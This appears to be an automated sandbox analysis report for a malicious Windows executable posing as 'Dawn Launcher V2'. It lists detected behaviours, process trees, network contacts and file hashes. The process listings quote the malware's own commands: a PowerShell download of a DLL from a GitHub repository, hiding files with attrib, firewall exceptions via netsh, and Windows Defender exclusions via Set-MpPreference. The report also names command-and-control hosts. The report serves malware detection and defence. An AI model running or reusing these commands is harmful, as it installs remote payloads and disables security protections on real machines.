Analysis Overview
SHA256
ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
Threat Level: Known bad
The file aa947ac87e8151f7a183a3ce9b0d5860.exe was found to be: Known bad.
Malicious Activity Summary
Contains code to disable Windows Defender
Sets file to hidden
Modifies Windows Firewall
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Unsigned PE
Program crash
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Views/modifies file attributes
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-07 19:22
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-01-07 19:22
Reported
2024-01-07 19:25
Platform
win10v2004-20231222-en
Max time kernel
1s
Max time network
152s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Roaming\Dawn.exe |
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe
"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\Dawn.exe
"C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp76E5.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
C:\Windows\SysWOW64\certutil.exe
certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5020 -ip 5020
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5020 -s 2620
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.181.190.20.in-addr.arpa | udp |
| FR | 51.38.37.194:7981 | | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| FR | 51.38.37.194:7981 | | tcp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.135.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 232.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.91.104.in-addr.arpa | udp |
| US | 52.111.227.11:443 | | tcp |
| GB | 96.17.179.48:80 | | tcp |
| GB | 96.17.179.48:80 | | tcp |
| GB | 96.17.179.48:80 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 8.8.8.8:53 | | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| GB | 88.221.135.217:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\tmp5B5E.tmpDawn Launcher V2.exe
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-07 19:22
Reported
2024-01-07 19:25
Platform
win7-20231129-en
Max time kernel
5s
Max time network
140s
Command Line
Signatures
Contains code to disable Windows Defender
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe | N/A |
| N/A | N/A | N/A | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\libcrypto-1_1.dll | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| File created | C:\Windows\SysWOW64\libssl-1_1.dll | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe
"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Users\Admin\AppData\Roaming\Dawn.exe
"C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe
"C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"
C:\Windows\SysWOW64\attrib.exe
attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
C:\Windows\SysWOW64\certutil.exe
certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit
Network
| Country | Destination | Domain | Proto |
| FR | 51.38.37.194:7981 | | tcp |
| FR | 51.38.37.194:7981 | | tcp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | Buju.duckdns.org | udp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| US | 8.8.8.8:53 | Buju.duckdns.org | udp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
| NL | 91.109.190.7:4040 | Buju.duckdns.org | tcp |
Files
\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 023866645753eaaf44d90d52b1318774 |
| SHA1 | 494b387fbf69c9217c7a59dff4c583c58ae97087 |
| SHA256 | 073e485754cba379c158a1e74cb9d38980cd7aa2bf209b3b43e96b8112a67644 |
| SHA512 | f0f6e62a36fe8180354af223ea7851eb2933267b0b1da8a6d84d3737156df168ffe6f0da0674f77bf68a1203375828dc0bf72ae4351ffedb3f1a0bc0b80a82be |
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 7cb160b0abe15b3cea529ca00f880b63 |
| SHA1 | c620a6386f68ff31251e1fe0f774fde80d40399f |
| SHA256 | cc594ca27a74f5c1ab71db3c980c8cb0007a23a84414f3a32ebc92ea95ec82cd |
| SHA512 | 9ab45cc406634b30dfd0686bf2f6c502a1f09f85ddd31048473ce3e7ad681296ff2aad69cbb8a2e978272a5194528d8df25336c555e5e8af15b3338808b67936 |
\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | dd17771ebc61382ea1d84832cd2d886a |
| SHA1 | e2ea1805181ee8beb5d717e6679a3eada8b46d66 |
| SHA256 | 9c818d0262c7d1c2ec2c1271ceed8bbb6259341f3d880337afaea0dd772e322e |
| SHA512 | 56089fb66283b771d2e0f7674624c418c0b7d41bf7430df8965207a2bdbffda8ee862913892f0a8da7cfa208e864f3fdc64336c46f1094fb29f1d34154df528d |
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe
| MD5 | 4742731bb77c1d125809906c7dafee17 |
| SHA1 | c70c2452a184ee3dbaeb5f566569bc235648844d |
| SHA256 | 93ee7f985541332f97d1379c180b31dc185ce283cb32e93115bb75650c33e370 |
| SHA512 | 414563c70b97e957cfbc76d344dd64e8a67bdadd606a59178a0b96f80778c42ffaad7e4d4e58dfefbb5982a699165a0ba4d171d006345e79937780d7b63a40b9 |